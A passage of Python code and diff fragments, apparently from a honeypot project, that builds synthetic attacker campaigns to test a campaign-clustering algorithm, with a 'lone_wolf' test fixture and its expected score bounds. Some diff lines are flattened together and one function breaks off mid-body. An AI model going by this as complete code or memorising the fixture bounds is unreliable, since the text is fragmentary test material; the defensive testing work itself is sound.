    sessions: list[SyntheticSession]

    def truth_labels(self) -> dict[str, str]:
        """Map each attacker_id to its truth_campaign_id (the scoring oracle)."""
        labels: dict[str, str] = {}
        for attacker in self.attackers:
            labels[attacker.attacker_id] = attacker.truth_campaign_id
        return labels
def _validate_campaign_spec(spec: dict[str, Any]) -> list[str]:
    """Validate one ``{"campaign": {...}}`` wrapper from the DSL.

    Args:
        spec: Parsed YAML (or an inline dict) holding a single campaign
            under the top-level ``campaign`` key.

    Returns:
        Human-readable warnings for specs that are accepted but worth
        flagging: phases outside OBSERVABLE_PHASES, and phases that omit
        ``actor`` in a multi-actor campaign.

    Raises:
        DSLValidationError: on any structural problem, namely a missing or
            non-mapping ``campaign``, missing required keys, no actors, an
            actor without ``id``, duplicate actor ids, a non-list
            ``phases``, a phase without ``name``, an unknown UKC phase
            name, or a phase that references an undeclared actor.
    """
    if not isinstance(spec, dict) or "campaign" not in spec:
        raise DSLValidationError("missing top-level 'campaign' key")
    c = spec["campaign"]
    if not isinstance(c, dict):
        # e.g. a bare `campaign:` line in YAML parses to None.
        raise DSLValidationError("'campaign' must be a mapping")
    for key in ("id", "actors", "phases"):
        if key not in c:
            raise DSLValidationError(f"campaign missing required key: {key}")

    actors = c["actors"]
    if not isinstance(actors, (list, tuple)) or not actors:
        raise DSLValidationError("campaign must declare at least one actor")

    actor_ids: set[Any] = set()
    for i, actor in enumerate(actors):
        if not isinstance(actor, dict) or "id" not in actor:
            raise DSLValidationError(f"actor[{i}] missing 'id'")
        if actor["id"] in actor_ids:
            # The generator keys its per-actor attacker table by id, so a
            # duplicate would leave one attacker record with no sessions.
            raise DSLValidationError(f"duplicate actor id '{actor['id']}'")
        actor_ids.add(actor["id"])

    phases = c["phases"]
    if not isinstance(phases, (list, tuple)):
        raise DSLValidationError("campaign 'phases' must be a list")

    warnings: list[str] = []
    for i, ph in enumerate(phases):
        if not isinstance(ph, dict) or "name" not in ph:
            raise DSLValidationError(f"phase[{i}] missing 'name'")
        try:
            phase_enum = UKCPhase(ph["name"])
        except ValueError as exc:
            raise DSLValidationError(
                f"phase[{i}] has unknown UKC phase '{ph['name']}'"
            ) from exc
        if phase_enum not in OBSERVABLE_PHASES:
            warnings.append(
                f"phase '{ph['name']}' is pre-target / unobservable from a "
                f"honeypot; no events will be emitted for it"
            )
        if "actor" in ph:
            if ph["actor"] not in actor_ids:
                raise DSLValidationError(
                    f"phase[{i}] references unknown actor '{ph['actor']}'"
                )
        elif len(actor_ids) > 1:
            # Single-actor campaigns may omit phase.actor. In a multi-actor
            # campaign the generator falls back to the first declared
            # actor, which is rarely what the author meant. This is a
            # warning rather than an error so existing specs still load.
            warnings.append(
                f"phase[{i}] omits 'actor' in a multi-actor campaign; it "
                f"will be attributed to the first declared actor"
            )
    return warnings
+ while True: + a = rng.randint(1, 223) + if a in (10, 127): + continue + b = rng.randint(0, 255) + if a == 172 and 16 <= b <= 31: + continue + if a == 192 and b == 168: + continue + c = rng.randint(0, 255) + d = rng.randint(1, 254) + return f"{a}.{b}.{c}.{d}" + + +def _payload_hash(seed: str) -> str: + return hashlib.sha256(seed.encode()).hexdigest() + + +def _hour_to_offset(rng: random.Random, day_start: datetime, hour: int, jitter_s: int) -> datetime: + base = day_start.replace(hour=hour, minute=0, second=0, microsecond=0) + return base + timedelta(seconds=rng.randint(-jitter_s, jitter_s) + rng.randint(0, 3600)) + + +def generate(spec: dict[str, Any], *, seed: int = 0) -> GeneratedCorpus: + """ + Produce a deterministic synthetic corpus from a parsed YAML spec. + + The spec mirrors the schema documented in CAMPAIGN_CLUSTERING.md. + Multiple campaigns + a noise block can be combined by wrapping them + in a top-level `corpus:` key; otherwise a single `campaign:` is + expected. + """ + rng = random.Random(seed) + + campaigns: list[dict[str, Any]] + noise_cfg: dict[str, Any] + if "corpus" in spec: + campaigns = spec["corpus"].get("campaigns", []) + noise_cfg = spec["corpus"].get("noise", {}) or {} + else: + campaigns = [spec] + noise_cfg = {} + + attackers: list[SyntheticAttacker] = [] + sessions: list[SyntheticSession] = [] + + for c_wrapper in campaigns: + warnings = _validate_campaign_spec(c_wrapper) + # Surface warnings via stderr-like channel — tests can opt to assert. + for w in warnings: + # Stored on the corpus for inspection rather than printed; tests + # that care can dig into the spec, but most don't. 
def _emit_campaign(
    c: dict[str, Any],
    rng: random.Random,
    attackers: list[SyntheticAttacker],
    sessions: list[SyntheticSession],
) -> None:
    """Append one campaign's attackers and sessions to the output lists.

    Creates one SyntheticAttacker per declared actor, then walks the
    phases in declared order and emits ``target_selector.count`` sessions
    (default 1) for each phase in OBSERVABLE_PHASES. Other phases emit
    nothing.

    Args:
        c: The campaign mapping (the value under the ``campaign`` key).
        rng: Seeded generator; every random choice is drawn from it.
        attackers: Output list, extended in place.
        sessions: Output list, extended in place.
    """
    campaign_id = c["id"]
    duration_days = int(c.get("duration_days", 1))
    pause_windows: list[tuple[int, int]] = [
        tuple(p) for p in (c.get("pause_windows") or [])  # type: ignore[misc]
    ]
    # Days on which sessions may be scheduled. Invariant across sessions
    # and involves no RNG draws, so it is computed once.
    open_days = [
        d for d in range(duration_days)
        if not any(s <= d <= e for s, e in pause_windows)
    ]

    # Anchor the synthetic timeline at a fixed epoch so determinism holds
    # across runs regardless of wall clock.
    epoch = datetime(2026, 1, 1, tzinfo=timezone.utc)

    # One attacker record per actor. first_seen/last_seen start at the
    # epoch as placeholders and are replaced by the first emitted session.
    actor_attackers: dict[str, SyntheticAttacker] = {}
    actor_specs: dict[str, dict[str, Any]] = {}
    for actor in c["actors"]:
        att = SyntheticAttacker(
            attacker_id=_stable_uuid(rng, "att"),
            ip=_stable_ip(rng),
            asn=int(actor.get("asn", 0)),
            ja3=actor.get("ja3"),
            hassh=actor.get("hassh"),
            first_seen=epoch,
            last_seen=epoch,
            truth_campaign_id=campaign_id,
            truth_actor_id=actor["id"],
        )
        actor_attackers[actor["id"]] = att
        actor_specs.setdefault(actor["id"], actor)
        attackers.append(att)

    decky_pool = [f"decky-{i:02d}" for i in range(1, 21)]
    # Most recent decky each actor hit during exploitation/persistence.
    last_success_decky: dict[str, str] = {}

    for ph in c["phases"]:
        phase = UKCPhase(ph["name"])
        if phase not in OBSERVABLE_PHASES:
            continue  # pre-target phase; emit nothing

        # A phase without an explicit actor belongs to the first declared one.
        actor_id = ph.get("actor") or c["actors"][0]["id"]
        att = actor_attackers[actor_id]
        actor_spec = actor_specs[actor_id]

        sig = ph.get("tool_signature", {}) or {}
        commands = sig.get("commands")
        if commands is None:
            # Missing or null falls back to the phase defaults; an explicit
            # empty list is kept as "no commands".
            commands = _PHASE_DEFAULT_COMMANDS[phase]
        creds_list = sig.get("credentials") or []
        c2 = sig.get("c2_callback")
        payload_seed = sig.get("payload_hash")
        payload = _payload_hash(payload_seed) if payload_seed else None

        target_sel = ph.get("target_selector", {}) or {}
        n_sessions = int(target_sel.get("count", 1))
        if target_sel.get("decky") == "previous_success":
            # Stick to the decky of the actor's last successful entry, or
            # the first pool entry if there has been none.
            decky_choices = [last_success_decky.get(actor_id, decky_pool[0])]
        else:
            decky_choices = decky_pool

        # Missing, null, or empty hours all mean "active around the clock".
        active_hours = actor_spec.get("hours_active_utc") or list(range(24))
        jitter = int(actor_spec.get("jitter_seconds", 60))

        for _ in range(n_sessions):
            day = rng.randint(0, max(0, duration_days - 1))
            if any(start <= day <= end for start, end in pause_windows):
                # The drawn day is paused: redraw uniformly among the
                # unpaused days, or drop the session if there are none.
                if not open_days:
                    continue
                day = rng.choice(open_days)
            hour = rng.choice(active_hours)
            day_start = epoch + timedelta(days=day)
            started_at = _hour_to_offset(rng, day_start, hour, jitter)
            duration_s = float(ph.get("dwell_seconds", 5))

            sess = SyntheticSession(
                session_id=_stable_uuid(rng, "sess"),
                attacker_id=att.attacker_id,
                decky_id=rng.choice(decky_choices),
                started_at=started_at,
                duration_s=duration_s,
                phase=phase,
                commands=list(commands),
                credentials_tried=[tuple(p) for p in creds_list],  # type: ignore[misc]
                payload_hash=payload,
                c2_callback=c2,
                truth_campaign_id=campaign_id,
                truth_actor_id=actor_id,
            )
            sessions.append(sess)
            att.sessions.append(sess)

            # Track the observed window by session count rather than by
            # comparing against the epoch placeholder. Negative jitter can
            # put a session before the epoch, and a session can land
            # exactly on it; both confuse a sentinel comparison.
            if len(att.sessions) == 1:
                att.first_seen = started_at
                att.last_seen = started_at
            else:
                att.first_seen = min(att.first_seen, started_at)
                att.last_seen = max(att.last_seen, started_at)

            # If this phase is a "successful entry," remember the decky
            # for any subsequent previous_success target_selector.
            if phase in (UKCPhase.EXPLOITATION, UKCPhase.PERSISTENCE):
                last_success_decky[actor_id] = sess.decky_id
Kept tiny so tests can inline-build specs too.""" + text = Path(path).read_text(encoding="utf-8") + parsed = yaml.safe_load(text) + if not isinstance(parsed, dict): + raise DSLValidationError(f"campaign YAML at {path} did not parse to a mapping") + return parsed diff --git a/tests/fixtures/campaigns/lone_wolf.expected.yaml b/tests/fixtures/campaigns/lone_wolf.expected.yaml new file mode 100644 index 00000000..55a93131 --- /dev/null +++ b/tests/fixtures/campaigns/lone_wolf.expected.yaml @@ -0,0 +1,17 @@ +# Bounds for fixture 3 (lone_wolf). +# +# Every actor in this fixture is a singleton (the wolf itself, plus +# every background-noise scanner). A correct clusterer puts each in +# its own cluster; that's a perfect score. +# +# Bounds are deliberately loose at first — we ratchet them up as the +# algorithm matures. Loosening any bound to make CI pass requires +# justification in the PR description (per CAMPAIGN_CLUSTERING.md §2). +adjusted_rand_index: + min: 0.85 +homogeneity: + min: 0.90 +completeness: + min: 0.80 +singleton_recall: + min: 0.95 diff --git a/tests/fixtures/campaigns/lone_wolf.yaml b/tests/fixtures/campaigns/lone_wolf.yaml new file mode 100644 index 00000000..d0082690 --- /dev/null +++ b/tests/fixtures/campaigns/lone_wolf.yaml @@ -0,0 +1,32 @@ +# Fixture 3 (lone_wolf) — see development/CAMPAIGN_CLUSTERING.md §2. +# +# One opportunistic scanner, Delivery phase only, no follow-up, no shared +# signals with anyone else. Surrounded by background noise. The clusterer +# must keep the wolf and every noise scanner as their own singleton — +# none should be absorbed into anyone else. +# +# This is the simplest of the six fixtures and exists primarily to prove +# the end-to-end pipeline (DSL → factory → clusterer → metrics) before +# we invest in the harder scenarios. 
+corpus: + campaigns: + - campaign: + id: lone-wolf-001 + actors: + - id: wolf-a + asn: 14061 + ip_pool: sticky + ja3: null + hassh: null + hours_active_utc: [3, 4, 5] + jitter_seconds: 30 + phases: + - name: delivery + actor: wolf-a + target_selector: + service: any + count: 1 + dwell_seconds: 1 + duration_days: 1 + noise: + scanner_count: 8